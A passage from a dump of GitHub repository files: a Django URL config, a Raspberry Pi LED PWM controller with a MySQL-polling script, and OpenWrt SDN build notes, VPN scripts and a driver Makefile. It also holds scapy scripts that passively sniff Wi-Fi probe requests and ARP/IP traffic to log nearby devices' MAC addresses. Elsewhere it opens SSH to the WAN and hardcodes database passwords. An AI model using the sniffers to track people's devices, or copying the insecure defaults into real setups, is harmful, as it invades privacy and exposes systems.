"license_type": "no_license",
"max_line_length": 51,
"num_lines": 8,
"path": "/customAI/urls.py",
"repo_name": "Gaurav561/object_detection",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\r\nfrom django.urls import include,path\r\nfrom . import views\r\nurlpatterns = [\r\n\r\n path('', views.index , name='index'),\r\n path('dataset/', views.create_data , name='db')\r\n]\r\n"
},
{
"alpha_fraction": 0.7303522825241089,
"alphanum_fraction": 0.7682926654815674,
"avg_line_length": 80,
"blob_id": "b3d4322ef1dff60497adb2adb877d2d13b15c4e8",
"content_id": "36917cfb21c9f77e146a2a4864289937fc2f03e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 738,
"license_type": "no_license",
"max_line_length": 250,
"num_lines": 9,
"path": "/run_model.py",
"repo_name": "Gaurav561/object_detection",
"src_encoding": "UTF-8",
"text": "import os\r\n\r\n\r\nos.system(\"python dataset_extraction.py\")\r\nos.system(\"python dataset_extraction1.py\")\r\nos.system(\"python generate_tfrecord.py --csv_input=train_labels.csv --image_dir=images/train --output_path=train.record\")\r\nos.system(\"python generate_tfrecord.py --csv_input=test_labels.csv --image_dir=images/test --output_path=test.record\")\r\nos.system(\"python model_main_tf2.py --model_dir=training/ --pipeline_config_path=training/ssd_efficientdet_d0_512x512_coco17_tpu-8.config\")\r\nos.system(\"python .\\exporter_main_v2.py --input_type image_tensor --pipeline_config_path training\\ssd_efficientdet_d0_512x512_coco17_tpu-8.config --trained_checkpoint_dir .\\efficientdet_d0_coco17_tpu-32 --output_directory .\\exported-models\\my_model\")\r\n"
}
] | 4 |
honzasram/LED-RPi-controler
|
https://github.com/honzasram/LED-RPi-controler
|
ef95aac7d589af295fab13e721c3d7974e2d0d81
|
6f155d67d787921c5233f274bfc33ebfd1519c83
|
8ff6fcd63b89e6c0e4b0ffde75dd02edfadc815e
|
refs/heads/master
| 2021-03-16T09:55:24.634780 | 2014-10-12T13:26:02 | 2014-10-12T13:26:02 | 25,084,820 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7447916865348816,
"alphanum_fraction": 0.7621527910232544,
"avg_line_length": 43.30769348144531,
"blob_id": "99c92340f5cb66c9779a0b0c4e1c1e3506f0a397",
"content_id": "91a87daa552f83c4ac922cd0c1cf9fb101eed5a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 576,
"license_type": "no_license",
"max_line_length": 172,
"num_lines": 13,
"path": "/README.md",
"repo_name": "honzasram/LED-RPi-controler",
"src_encoding": "UTF-8",
"text": "LED-RPi-controler\n=================\n\nSoftware and desctription of hardware for project. \n\nBrain of this project is Raspberry Pi. To this simple piece of computer is connected module for PWM and to that is attached some transistors for controlling RGB LED strips.\nThat is only HW. All is controlled by user via interface. IT is based on web but also it can be some buttons. It depends on you and you style.\n\nWhat is needed:\n\nyou have to use Adafruit 16-Channel 12-bit PWM/Servo Driver - I2C interface - PCA9685\n\nalso it is needed to have installed i2c-tools, screen and python\n"
},
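A minimal sketch of driving one RGB strip on the PCA9685 with the same Adafruit_PWM_Servo_Driver module that LEDs.py in this repo uses; the 0x40 address, the 1 kHz frequency and the 16x scaling from 0..255 to the chip's 12-bit range match that script, while the channel layout helper is illustrative.

from Adafruit_PWM_Servo_Driver import PWM

pwm = PWM(0x40)          # default I2C address of the PCA9685
pwm.setPWMFreq(1000)     # 1 kHz, same as LEDs.py

def set_rgb(strip, r, g, b):
    # each LED strip occupies three consecutive PCA9685 outputs;
    # 0..255 color values are scaled to the chip's 0..4095 duty range
    for offset, value in enumerate((r, g, b)):
        pwm.setPWM(strip * 3 + offset, 0, int(16 * value))

set_rgb(0, 255, 0, 64)   # first strip: mostly red with a little blue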
{
"alpha_fraction": 0.6153846383094788,
"alphanum_fraction": 0.6153846383094788,
"avg_line_length": 12,
"blob_id": "d37142cf5d4d19bb0bc13520352f4534ebb6b260",
"content_id": "2aa2443baeee32cdf26ccadd99a10198d5a7cb2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 13,
"license_type": "no_license",
"max_line_length": 12,
"num_lines": 1,
"path": "/SW/ServerSide/C-language/program.cpp",
"repo_name": "honzasram/LED-RPi-controler",
"src_encoding": "UTF-8",
"text": "//to be done\n"
},
{
"alpha_fraction": 0.7028571367263794,
"alphanum_fraction": 0.7219047546386719,
"avg_line_length": 29.882352828979492,
"blob_id": "c0226f5b6676451304577ffdb9351c9e8050e4a3",
"content_id": "97543d494213a8e301fcdbe1b4935b419ae2d57f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 525,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 17,
"path": "/SW/Settings/raspiNeeds.sh",
"repo_name": "honzasram/LED-RPi-controler",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n#this is script which will prepare your RPi to work with module via I2C bus and also it will set up other things like web server, cron table, etc.\n\n\n\necho '# blacklist spi and i2c by default (many users dont need them)' > /etc/modprobe.d/raspi-blacklist.conf\necho 'blacklist spi-bcm2708' >> /etc/modprobe.d/raspi-blacklist.conf\necho 'i2c-dev' >> /etc/modules\n\nsudo apt-get update\nsudo apt-get install i2c-tool\n\n(sudo crontab -l; echo \"@reboot sleep 10 &&/home/pi/.run &\" ) | sudo crontab\n\ncp ./run ~/.run\n\nreboot\n"
},
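A quick I2C sanity check to run after the setup script above, as a sketch: it confirms the PCA9685 answers at its default address 0x40. The bus number is an assumption (bus 0 on first-revision Raspberry Pi boards, bus 1 on rev 2 and later; adjust as needed).

import smbus

bus = smbus.SMBus(0)     # assumption: early-revision Pi; use SMBus(1) on rev 2+
try:
    bus.read_byte(0x40)  # any ACKed read proves a device is present
    print("PCA9685 found at 0x40")
except IOError:
    print("no device at 0x40 - check wiring and the i2c kernel modules")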
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.625,
"avg_line_length": 11,
"blob_id": "f47bd0e0b7f59703e27176488bf23d4752517612",
"content_id": "bf2dc537c2a663b31abd9d04ba2de65fd764536a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 24,
"license_type": "no_license",
"max_line_length": 11,
"num_lines": 2,
"path": "/setup.sh",
"repo_name": "honzasram/LED-RPi-controler",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n#to be done\n"
},
{
"alpha_fraction": 0.6333333253860474,
"alphanum_fraction": 0.6333333253860474,
"avg_line_length": 21.25,
"blob_id": "fc4375da0b5f610cad43d6cd0929f5e1b5e437f4",
"content_id": "16a68003a9531b3a4229d7bea27adc0a8c37b829",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 90,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 4,
"path": "/run.sh",
"repo_name": "honzasram/LED-RPi-controler",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nscreen -d -m /home/pi/PWM/Obj.py\n#screen -d -m /home/pi/.temp\n# to be edited \n"
},
{
"alpha_fraction": 0.4750049412250519,
"alphanum_fraction": 0.49871566891670227,
"avg_line_length": 27.74431800842285,
"blob_id": "fd1bed11cc79462608733b4699894e752663c2ad",
"content_id": "ede5ae8aec9c227b49fe4ebf6688bbdcf1ea4f90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5061,
"license_type": "no_license",
"max_line_length": 299,
"num_lines": 176,
"path": "/SW/ServerSide/LEDs.py",
"repo_name": "honzasram/LED-RPi-controler",
"src_encoding": "UTF-8",
"text": "\n#!/usr/bin/python\nimport sys\nsys.path.append(\"/home/pi/PWM\")\nfrom Adafruit_PWM_Servo_Driver import PWM\nimport time\nimport threading\nimport MySQLdb\nimport colorsys\nimport os\n\n#main dealing with arguments\nif len(sys.argv)>1:\n if sys.argv[1]==\"debug\":\n debug = True\nelse:\n debug = False\n sys.stdout = open('program.log','a')\n\n#pidfile dealing\npid = os.getpid()\nprint str(pid)\npidfile = open('/var/run/program.pid','w')\npidfile.write(str(pid))\npidfile.close()\nos.nice(-10)\n\n#set up main variables\nprogram=0\nsl=0.01\nGh=0.0\ns=0.0\nl=0.0\nrun=0\n\n#setup for PWM modul\npwm = PWM(0x40, debug=True);\npwm.setPWMFreq(1000);\npwm.setPWM(15,0,4095)\nledField = []\n\nclass ledChannel:\n r=0\n g=0\n b=0\n rb=0\n number=0\n program = 0\n step=0\n sleep=0\n h=0\n l = 0.5\n s = 1\n Pmodul = None\n global Gh\n def __init__(self,number,name,Pmodul):\n self.number = number\n self.name = name\n self.Pmodul = Pmodul\n self.lock = threading.Lock()\n\n def __repr__(self):\n return \"-----------------------------------------\\n\"+str(self.number)+\", \"+str(self.name)+\"\\nthis is color of this channel r:\"+str(self.r)+\" g:\"+str(self.g)+\"b:\"+str(self.b)+\"\\n program is \"+str(self.program)+\", also step and sleep is:\"+str(self.step)+\" \"+str(self.sleep)+\"\\n\\n\\n\\n\";\n\n def __str__(self):\n return \"-----------------------------------------\\n\"+str(self.number)+\", \"+str(self.name)+\"\\nthis is color of this channel r:\"+str(self.r)+\" g:\"+str(self.g)+\"b:\"+str(self.b)+\"\\n program is \"+str(self.program)+\", also step and sleep is:\"+str(self.step)+\" \"+str(self.sleep)+\"\\n\\n\\n\\n\";\n\n def setColor(self, r,g,b):\n self.r = r\n self.b = b\n self.g = g\n\n def setHLS(self,h,l,s):\n color = colorsys.hls_to_rgb(h, l, s);\n #print color\n self.r=color[0]*255\n self.g=color[1]*255\n self.b=color[2]*255\n\n def updateDir(self):\n #print \"R>\"+str(int(16*self.r))+\" G>\"+str( int(16*self.g))+\" B>\"+str( int(16*self.b))\n self.Pmodul.setPWM(1+3*self.number-1,0,int(16*self.r));\n self.Pmodul.setPWM(2+3*self.number-1,0,int(16*self.g));\n self.Pmodul.setPWM(3+3*self.number-1,0,int(16*self.b));\n\n def update(self):\n if self.program == 0:\n #print \"still normal color\"\n self.Pmodul.setPWM(1+3*self.number-1,0,int(16*self.r));\n self.Pmodul.setPWM(2+3*self.number-1,0,int(16*self.g));\n self.Pmodul.setPWM(3+3*self.number-1,0,int(16*self.b));\n return;\n\n if self.program == 1:\n self.h += self.step\n self.setHLS(self.h,self.l,self.s)\n self.updateDir()\n\n if self.program == 2:\n self.setHLS(Gh,self.l,self.s)\n self.updateDir()\n\n#pocatecni naplneni pole s kanaly, zde se bude tahat jmeno z databaze\nfor i in range(0,5):\n temp = ledChannel(i,\"this is chanel nmbr:\"+str(i),pwm)\n ledField.append(temp)\n\n\ndef mysql():\n db=MySQLdb.connect(host='localhost',user='led',passwd='led',db='LED')\n cur = db.cursor()\n cur.execute(\"SELECT * FROM mainColors LIMIT 5;\")\n p=0\n for row in cur.fetchall() :\n program=int(row[4])\n h=row[1]\n s=row[3]\n l=row[2]\n sleep = row[6]\n step = row[5]\n #print row\n if program == 0:\n ledField[p].setHLS(h,l,s)\n ledField[p].program = program\n ledField[p].step = step\n ledField[p].sleep = sleep\n if program == 1:\n ledField[p].program = program\n ledField[p].step = step\n ledField[p].sleep = sleep\n ledField[p].l = l\n ledField[p].s = s\n if program == 2:\n ledField[p].program = program\n ledField[p].step = step\n ledField[p].sleep = sleep\n ledField[p].l = l\n ledField[p].s = s\n #print ledField[p]\n p+=1\n\n cur.close()\n 
db.close()\n\ndef updateField():\n update = False\n updateStep = 0\n global Gh\n for i in range(0,5):\n ledField[i].update();\n if ledField[i].program == 2:\n update = True\n updateStep = ledField[i].step\n if update:\n Gh+=updateStep\n\ndef end():\n ending = open(\"/home/pi/PWM/end.sys\",\"r\")\n if ending.read(4)==\"True\":\n out(\"ENDING APP by end file\")\n ending.close()\n e=open('/home/pi/PWM/end.sys','w')\n e.write('False')\n exit()\n\n\ntry:\n while 1:\n end()\n mysql()\n updateField()\n #print ledField\n time.sleep(sl)\nexcept KeyboardInterrupt:\n ledField[1].program = 0\n updateField()\n exit()\n\n"
}
] | 6 |
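Two notes on the LEDs.py record above. First, the Czech comment "pocatecni naplneni pole s kanaly, zde se bude tahat jmeno z databaze" translates to "initial filling of the channel array; the name will be pulled from the database here". Second, end() calls out("ENDING APP by end file"), but no out() is defined anywhere in the script, so the end.sys shutdown path would crash with NameError instead of exiting cleanly, and the file handles are never closed on that path. A sketch of the intended behaviour; print doubles as the logger because the script already redirects sys.stdout to program.log outside debug mode:

def end():
    with open("/home/pi/PWM/end.sys", "r") as ending:
        if ending.read(4) == "True":
            print("ENDING APP by end file")
            with open("/home/pi/PWM/end.sys", "w") as e:
                e.write("False")
            exit()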
houzhenggang/openwrtSDN
|
https://github.com/houzhenggang/openwrtSDN
|
51b0593d7bedb173735aeff7f584ef437141c250
|
49690da69c5e627bac946b9050dcc4b4fb313761
|
59eaaa9ab1c157996b4f8768bcf997b5df72c46e
|
refs/heads/master
| 2021-01-18T04:47:53.290990 | 2015-01-22T07:56:48 | 2015-01-22T07:56:48 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7111111283302307,
"alphanum_fraction": 0.7222222089767456,
"avg_line_length": 29,
"blob_id": "00b5a8aac4d2b5c2180f3c743b441b1537586231",
"content_id": "5e558ae970da2eef93d0e9c454cf53ebeb51e41f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 90,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 3,
"path": "/packages/iipr/files/etc/openvpn/down-ibvpn.sh",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\niptables --table nat --delete POSTROUTING --out-interface $2 --jump MASQUERADE\n"
},
{
"alpha_fraction": 0.7526746392250061,
"alphanum_fraction": 0.7627438902854919,
"avg_line_length": 38.650001525878906,
"blob_id": "42d86ae305dcc23bed2b7299fcb525b1f05fcda0",
"content_id": "04d34c8d09cbb65a83b9c7c7adc2acf7aa21e851",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1589,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 40,
"path": "/scripts/build.sh",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": " # rather than a functioning script this serves as a form of documentation of what might have transpired\n # but it would be pretty cool if it could be reliably reproduced\n\n sudo apt-get install subversion build-essential libncurses5-dev zlib1g-dev gawk flex quilt git-core\n cd projects/openwrt/12.09\n git clone git://git.openwrt.org/12.09/openwrt.git\n cd projects/openwrt/12.09/openwrt/\n git pull\n cp feeds.conf.default feeds.conf\n echo 'src-git openvswitch git://github.com/schuza/openvswitch.git' >> feeds.conf\n ./scripts/feeds update \n ./scripts/feeds install sflowovsd\n ./scripts/feeds install tspc\n ./scripts/feeds install gw6c\n ./scripts/feeds install odhcp6c\n ./scripts/feeds install openvpn\n ./scripts/feeds install luci\n ./scripts/feeds install iperf\n ./scripts/feeds install netperf\n ./scripts/feeds install simplejson\n ./scripts/feeds install python\n ./scripts/feeds install pyusb python-pcap python-curl python-event\n ./scripts/feeds install quagga\n ./scripts/feeds install haproxy\n ./scripts/feeds install wifidog\n ./scripts/feeds install lldpd\n ./scripts/feeds install igmpproxy\n ./scripts/feeds install gevent\n ./scripts/feeds install confuse\n ./scripts/feeds install tinc\n ./scripts/feeds install ipvsadm\n ./scripts/feeds install keepalived\n ./scripts/feeds install pypcap python-ifconfig python-json pysqlite twisted\n ./scripts/feeds install -a -p openvswitch\n ./scripts/feeds update luci\n echo '# CONFIG_KERNEL_BRIDGE is not set' >> .config\n cp /tmp/Makefile feeds/openvswitch/openvswitch/\n make menuconfig\n #make defconfig \n make\n\n"
},
{
"alpha_fraction": 0.38089480996131897,
"alphanum_fraction": 0.3857315480709076,
"avg_line_length": 31.090909957885742,
"blob_id": "1511a480d0c1420e640952e23ecd5272c25fa938",
"content_id": "fa7440b714ee461c22ef37bb49f6078631e8bd34",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 827,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 22,
"path": "/python/scapy/sniffarpip.py",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n\nimport sys\nfrom scapy.all import *\n\n# Run this script to fetch IPs and ARPs\ninterface = sys.argv[1] \nunique = []\n\ndef sniffarpip(p):\n if p.haslayer(IP):\n ip = p.sprintf(\"IP - [%IP.src%)|(%IP.dst%)]\")\n if unique.count(ip) == 0:\n unique.append(ip)\n print ip\n elif p.haslayer(ARP):\n arp = p.sprintf(\"ARP - [%ARP.hwsrc%)|(%ARP.psrc%)]-[%ARP.hwdst%)|(%ARP.pdst%)]\")\n if unique.count(arp) == 0:\n unique.append(arp)\n print arp\n \nsniff(iface=interface,prn=sniffarpip, store=0)\n \n"
},
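The sniffer above deduplicates with unique.count(x) on a list, which is a linear scan per packet and grows without bound under heavy traffic. A sketch of the same script using a set, with the stray ")" / "(" imbalance in the format strings evened out; everything else is unchanged.

import sys
from scapy.all import sniff, IP, ARP

interface = sys.argv[1]
seen = set()

def sniffarpip(p):
    if p.haslayer(IP):
        line = p.sprintf("IP - [(%IP.src%)|(%IP.dst%)]")
    elif p.haslayer(ARP):
        line = p.sprintf("ARP - [(%ARP.hwsrc%)|(%ARP.psrc%)]-[(%ARP.hwdst%)|(%ARP.pdst%)]")
    else:
        return
    if line not in seen:   # O(1) membership test instead of list.count()
        seen.add(line)
        print(line)

sniff(iface=interface, prn=sniffarpip, store=0)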
{
"alpha_fraction": 0.6049515604972839,
"alphanum_fraction": 0.6275565028190613,
"avg_line_length": 24.77777862548828,
"blob_id": "a342bf227056742d8676aec4177cff3cd9fb2670",
"content_id": "df82bc4b8ad7509eac82aa44a2db13828313023c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1858,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 72,
"path": "/python/scapy/probe1.py",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom threading import Thread\nfrom Queue import Queue, Empty\nfrom scapy.all import *\nimport sys\n\nm_iface = \"ra0\"\nm_finished = False\nunique_client_macs = []\nunique_ap_macs = []\nm_queue = Queue.Queue()\n\ndef sniffDot11(p):\t\n global m_queue\n if not p.haslayer(Dot11Beacon):\t\n if unique_ap_macs.count(p.addr2) == 0: \n unique_ap_macs.append(p.addr2)\n print p.sprintf(\"Found new client -> [%Dot11.addr1%][%Dot11.addr2%][%Dot11Elt.info%]\")\n if p.haslayer(Dot11Beacon):\n if unique_client_macs.count(p.addr2) == 0:\n unique_client_macs.append(p.addr2)\n print p.sprintf(\"Found new AP --> %Dot11.addr2%[%Dot11Elt.info%|%Dot11Beacon.cap%]\")\n m_queue.put(p)\n \n\ndef plain_sniff():\n sniff(iface=\"ra0\",prn=sniffDot11,store=0)\n\ndef print_summary(pkt):\n print pkt.summary()\n\ndef threaded_sniff_target(q):\n global m_finished\n sniff(iface=\"ra0\",prn=sniffDot11,store=0)\n# sniff(iface = m_iface, count = 10, filter = \"icmp and src {0}\".format(m_dst), prn = lambda x : q.put(x))\n m_finished = True\n\ndef threaded_sniff():\n global m_queue\n m_queue = Queue.Queue()\n sniffer = Thread(target = threaded_sniff_target, args = (m_queue,))\n sniffer.daemon = True\n sniffer.start()\n while (not m_finished):\n try:\n pkt = m_queue.get(timeout = 1)\n print_summary(pkt)\n print \"Send new client to DIPNUM server\"\n except Empty:\n pass\n\n# \ndef threaded_sniff_with_send():\n global m_queue\n m_queue = Queue.Queue()\n sniffer = Thread(target = threaded_sniff_target, args = (m_queue,))\n sniffer.daemon = True\n sniffer.start()\n while (not m_finished):\n send(IP(dst = m_dst) / ICMP())\n try:\n pkt = m_queue.get(timeout = 1)\n print_summary(pkt)\n except Empty:\n pass\n\n\n#plain_sniff()\n\nthreaded_sniff()\n\n\n"
},
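probe1.py above has a few problems: `from Queue import Queue, Empty` is followed by `m_queue = Queue.Queue()`, which raises AttributeError (it should be plain Queue()); the bookkeeping lists are swapped relative to the messages they print (non-beacon frames are appended to unique_ap_macs but reported as clients, and vice versa); and threaded_sniff_with_send references an undefined m_dst. A sketch of the queue and list fixes only, in the script's own Python 2 style:

from Queue import Queue, Empty
from scapy.all import Dot11Beacon

m_queue = Queue()                              # not Queue.Queue()
unique_client_macs = []
unique_ap_macs = []

def sniffDot11(p):
    if p.haslayer(Dot11Beacon):                # beacons come from APs
        if p.addr2 not in unique_ap_macs:
            unique_ap_macs.append(p.addr2)
            print p.sprintf("Found new AP --> %Dot11.addr2%[%Dot11Elt.info%|%Dot11Beacon.cap%]")
    else:                                      # everything else is treated as a client
        if p.addr2 not in unique_client_macs:
            unique_client_macs.append(p.addr2)
            print p.sprintf("Found new client -> [%Dot11.addr1%][%Dot11.addr2%][%Dot11Elt.info%]")
    m_queue.put(p)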
{
"alpha_fraction": 0.5559845566749573,
"alphanum_fraction": 0.5945945978164673,
"avg_line_length": 23.66666603088379,
"blob_id": "08941b2f16afce23a06760af8b5b5dba18827c4b",
"content_id": "c3222cd3be04878ddbded498f3d3d6f8b15e3523",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 518,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 21,
"path": "/python/scapy/non-beacon-probes.py",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom scapy.all import *\nimport sys\n\ninterface = sys.argv[1] \nunique = []\n\ndef sniffNonBeacon(p):\t\n if not p.haslayer(Dot11Beacon):\t\n if unique.count(p.addr2) == 0: \n unique.append(p.addr2)\n print p.sprintf(\"[%Dot11.addr1%][%Dot11.addr2%][%Dot11Elt.info%]\")\n''' \n\tprint \"add\", p.addr2\n\tprint p.summary()\n if unique.count(p.addr2) == 0: \n unique.append(p.addr2)\n'''\n\nsniff(iface=interface,prn=sniffNonBeacon,store=0)\n"
},
{
"alpha_fraction": 0.7628865838050842,
"alphanum_fraction": 0.7752577066421509,
"avg_line_length": 22.047618865966797,
"blob_id": "cb94249d19c03d91938219b71fffa649a74645fd",
"content_id": "baf5d743ef077b210cf45f6c97e04fd40ded79d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 970,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 42,
"path": "/notes/installing-gevent.md",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "\n#Building python gevent and greenlets \n\nRefs:\n\n[OpenWRT building a single package](http://wiki.openwrt.org/doc/howtobuild/single.package)\n\n[OpenWRT Buildroot - Usage](http://wiki.openwrt.org/doc/howto/build)\n\nSkip optional section 3 - feeds\n\nDo everything until make menuconfig\n\n*including* install feeds:\n\n\t./scripts/feeds update -a\n\t./scripts/feeds install -a\n\ncopy in the gevent and greenlet dirs to package/. renaming greenlet to python-greenlet\n\nedit .config to include the lines:\n\n\tCONFIG_PACKAGE_gevent=y\n\tCONFIG_PACKAGE_cython=y\n\tCONFIG_PACKAGE_python-greenlet=y\n\nthen make defconfig (this may be at wrong point??)\n\n\tmake tools/install\n\tmake toolchain/install\n\tmake package/gevent/compile\n\nThis will fail\n\t\n\tcd build_dir/target-mips_r2_uClibc-0.9.33.2/gevent-1.0rc2\n\tmake\n\tcd ..\n\tmake package/gevent/compile\n\tmake package/gevent/install\n\tmake package/python-greenlet/compile\n\tmake package/python-greenlet/install\n\nThe package should be in bin/ar71xx/packages/\n\n"
},
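A small smoke test for the cross-compiled packages the notes above produce, as a sketch; run it on the router after installing the gevent and python-greenlet ipks to confirm the greenlet C extension actually loads on the target.

import gevent
from gevent import monkey; monkey.patch_socket()

def work(n):
    gevent.sleep(0.1)                    # stand-in for real socket work
    return n * n

jobs = [gevent.spawn(work, n) for n in range(5)]
gevent.joinall(jobs, timeout=2)
print([job.value for job in jobs])       # [0, 1, 4, 9, 16]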
{
"alpha_fraction": 0.5472440719604492,
"alphanum_fraction": 0.7362204790115356,
"avg_line_length": 30.625,
"blob_id": "40bbb823afee950e7b99050305fe9c4e641c7431",
"content_id": "aa518d7832224ecc4244d7c1065d53ad0277302f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 254,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 8,
"path": "/packages/iipr/files/etc/openvpn/up.sh",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\nACTION=ifup DEVICE=tun0 INTERFACE=vpn /sbin/hotplug-call iface\n#/sbin/ifconfig tun0 10.8.0.238 pointopoint 10.8.0.237 mtu 1500\n#/etc/openvpn/up.sh tun0 1500 1560 10.8.0.238 10.8.0.237 init\n/sbin/ifconfig tun0 $4 pointopoint $5 mtu $2\n\nexit 0\n\n"
},
{
"alpha_fraction": 0.6209850311279297,
"alphanum_fraction": 0.6520342826843262,
"avg_line_length": 19.755556106567383,
"blob_id": "338b750dae12a4e3c9c2cb00f5283e1555efbab2",
"content_id": "a2f006802f900b83dd9990e04d6612c8e905ecb2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 934,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 45,
"path": "/packages/iipr/files/etc/uci-defaults/luci-start",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\nservices=\"olsrd quagga tinyproxy hsflowd haproxy sflowovsd relayd wifidog keepalived\" \n\nfor service in ${services} ; do \n\n/etc/init.d/${service} enabled && {\n\t/etc/init.d/${service} stop\n\t/etc/init.d/${service} disable\n}\n\ndone\n\nopenvpn --mktun --dev tap0\nifconfig tap0 0.0.0.0 promisc up\n\ncat << EOF >> /etc/config/network\n\nconfig interface 'vpn'\n option proto 'static'\n option ifname 'tap0'\n option dns '8.8.8.8 156.154.70.1'\nEOF\n\ncat << EOF >> /etc/config/firewall\n#Allow SSH\nconfig rule\n option src wan\n option proto tcp\n option dest_port 22\n option target ACCEPT\nEOF\n\nuci add firewall rule\nuci set firewall.@rule[-1].src=wan\nuci set firewall.@rule[-1].target=ACCEPT\nuci set firewall.@rule[-1].proto=tcp\nuci set firewall.@rule[-1].dest_port=22\nuci commit firewall\n/etc/init.d/firewall restart\n\n\ntouch /tmp/.luci-start.run\n\nexit 0\n"
},
{
"alpha_fraction": 0.6468531489372253,
"alphanum_fraction": 0.7167832255363464,
"avg_line_length": 26.410959243774414,
"blob_id": "a29ce3d3bf885893f74eddc6915f6912d225ce4a",
"content_id": "d0081117166a53e4b3d52d41618a3b6871ac4d22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 2002,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 73,
"path": "/packages/rtl819xc/Makefile",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#\n# Copyright (C) 2007-2012 OpenWrt.org\n#\n# This is free software, licensed under the GNU General Public License v2.\n# See /LICENSE for more information.\n#\n\ninclude $(TOPDIR)/rules.mk\ninclude $(INCLUDE_DIR)/kernel.mk\n\nPKG_NAME:=rtl819xc\n\n#PKG_VERSION:=v3.4.4_4749.20120806\nPKG_VERSION:=v4.0.2_9000.20130911\nPKG_RELEASE:=1\n#PKG_SOURCE_URL:=ftp://WebUser:[email protected]/cn/wlan\nPKG_SOURCE_URL:=http://iipr.com/sources/\nPKG_MD5SUM:=5f15575ba6ae58cae485e8060bc771ed\n\n#PKG_SOURCE:=RTL819xC_USB_linux_$(PKG_VERSION).zip\nPKG_SOURCE:=RTL8188C_8192C_USB_linux_$(PKG_VERSION).zip\nPKG_BUILD_DIR:=$(KERNEL_BUILD_DIR)/RTL8188C_8192C_USB_linux_$(PKG_VERSION)\nPKG_BUILD_PARALLEL:=1\n\nPKG_DRIVERS = 8192cu\n\ninclude $(INCLUDE_DIR)/package.mk\n\nWMENU:=Wireless Drivers\n\ndefine KernelPackage/rtl819xc\n\tSUBMENU:=$(WMENU)\n\tTITLE=Realtek 8192C USB WiFi\n\tURL:=http://http://www.realtek.com.tw/\n\tDEPENDS:= +wireless-tools @USB_SUPPORT\n\tFILES:= $(PKG_BUILD_DIR)/8192cu.ko\n\tAUTOLOAD:=$(call AutoLoad,21,8192cu)\nendef\n\ndefine KernelPackage/rtl819xc/description\nRealtek's linux drivers for the Realtek 8192C USB WiFi\nendef\n\nMAKE_OPTS:= \\\n\tCROSS_COMPILE=\"$(KERNEL_CROSS)\" \\\n\tARCH=\"$(LINUX_KARCH)\" \\\n\t$(foreach opt,$(CONFOPTS),CONFIG_$(opt)=m) \\\n\tCONFIG_RTL8192CU=$(if $(CONFIG_PACKAGE_kmod-rtl819xc),m) \\\n\tKLIB_BUILD=\"$(LINUX_DIR)\" \\\n\tKSRC=\"$(LINUX_DIR)\" \\\n\tMODPROBE=true \\\n\tKLIB=$(TARGET_MODULES_DIR) \\\n\tKERNEL_SUBLEVEL=$(lastword $(subst ., ,$(KERNEL_PATCHVER))) \\\n\tKBUILD_LDFLAGS_MODULE_PREREQ=\n\ndefine Build/Prepare\n\trm -rf $(PKG_BUILD_DIR)\n\tmkdir -p $(PKG_BUILD_DIR)\n\tunzip -d $(PKG_BUILD_DIR)/.. $(DL_DIR)/$(PKG_SOURCE) RTL8188C_8192C_USB_linux_$(PKG_VERSION)/driver/*\n\t$(TAR) -C $(PKG_BUILD_DIR) -xzf $(PKG_BUILD_DIR)/driver/*.tar.gz --strip-components 1\n\trm -rf 